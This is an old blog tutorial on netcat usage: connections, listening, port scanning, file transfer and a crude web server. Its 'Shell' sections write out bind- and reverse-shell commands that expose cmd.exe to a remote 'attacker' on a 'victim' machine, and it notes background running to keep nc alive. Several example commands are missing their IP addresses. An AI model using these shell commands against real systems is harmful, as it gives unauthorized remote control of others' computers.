Saturday, October 20, 2007

NetCat Training (Elementary)

*Connecting to Remote Machine (TCP):

nc [Remote Machine IP] [Port Number]
nc 80

*Connecting to Remote Machine (UDP):

nc [Remote Machine IP] -u [Port Number]
nc -u 1111

*If you want to see the Details:

Use ' -v ' parameter at end of the command line.
nc 80 -v

 More Verbose:
nc 80 -vv

*Listen Mode (TCP):

nc -l -p [Port Number]
nc -l -p 1234

*Listen Mode (UDP):

nc -l -u -p [Port Number]
nc -l -u -p 1234

*Port Scanning (TCP):

echo [String to Send] | nc -v -w [Time to Wait (Second)] [Remote Machine IP]
[First Port]-[Last Port]
echo QUIT | nc -v -w 3 1-10000

*Port Scanning (UDP):

echo [String to Send] | nc -v -w [Time to Wait (Second)] [Remote Machine IP] -u
[First Port]-[Last Port]
echo QUIT | nc -v -w 3 -u 1-10000

*Send & Recieve File (1):

 File Sending:
nc -l -p [Port Number] -s [Destination Machine IP] < [File Path]
nc -l -p 1234 -s <>

  Recieve the File:
nc [File Sending Machine IP] [Port Number] > [File Destination]
nc 1234 > E:\Peace (1).jpg

*Send & Recieve File (2):

File Sending:
nc [Destination Machine IP] [Port Number] < [File Path]
nc 1111 <>

 Recieve the File:
nc -l -p [Port Number] -s [File Sending Machine IP] > [File Destination]
nc -l -p 1111 -s > E:\Peace (1).jpg


Your Computer:
nc -l -p [Port Number] -s [Remote Machine IP]
nc -l -p 1111 -s

Remote Computer:
nc [ Your Computer IP] [Port Number]
nc 1111

(Now you can send PM by Console)

*Shell (1):

 Victim Computer:
nc -l -p [Port Number] -e [Console Application Path]
nc -l -p 1234 -e cmd.exe

 Attacker Computer:
nc [Victim Computer IP] [Port Number(Listen Mode)]
nc 1234

(Now you can type your command to execute on victim's computer)

*Shell (2):

 Attacker Computer:
nc -l -p [Port Number]
nc -l -p 1234

 Victim Computer:
nc [Attacker Computer IP] [Port Number] -e [Console Application Path]
nc 1234 -e cmd.exe

(When the victim connects to attacker's computer, attacker can type the code to execute on
victim machine)

*Web Server:

Create a Batch file; like ' WebServer.bat '. Insert line below into the batch file:
nc -l -p 80 -w [Time to wait for Client (Seconds)] < [HomePage File Path]
nc -l -p 80 -w [Time to wait for Client (Seconds)] < [Other files path]
Batch FileName.bat

nc -l -p 80 -w 1 < HomePage.htm
nc -l -p 80 -w 1 < BackgroundPicture.jpg
nc -l -p 80 -w 1 < BackgroundMusic.mp3

(Now type Server IP in your Web Browser(Except Opera))

Note1: We have 65535 Ports.

Note2: If you use ' -d ' parameter at the end of the command, NC will be contiue running
after closing Console Windows (Background Running).

Note3: ' CMD.exe ' (in MS Windows) & ' /bin/sh ' (in Linux)

Download NetCat 1.11
(31 KB - ConsoleApp .EXE)

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